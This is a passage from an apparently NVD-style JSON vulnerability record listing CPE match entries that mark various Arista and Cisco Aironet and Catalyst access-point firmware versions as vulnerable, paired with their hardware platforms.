                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-110_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-110:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-120_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-120:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-130_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-130:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-230_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-230:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-235_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-235:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-250_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-65_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-65:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-75_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-75:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:o-105_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:o-105:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:o-90_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:o-90:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:w-118_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:w-118:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:w-68_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:w-68:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100-8p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100-8p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1101-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1101-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1109-2p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1109-2p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1109-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1109-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1532_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1532:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1542d_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1542d:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1542i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1542i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1552_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1552:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1552h_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1552h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1572_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1572:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1702_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1702:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1800i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1800i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1810_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1810:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1810w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1810w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1815_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1815:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1815i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1815i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1832_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1832:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1842_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1842:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1852_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1852:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_2702_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_2702:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_2800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_2800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_2800e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_2800e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_2800i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_2800i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_3702_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_3702:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_3800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_3800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_3800e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_3800e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_3800i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_3800i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_3800p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_3800p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_4800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_4800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_ap803_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_ap803:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_iw3702_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_iw3702:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105axw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105axw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
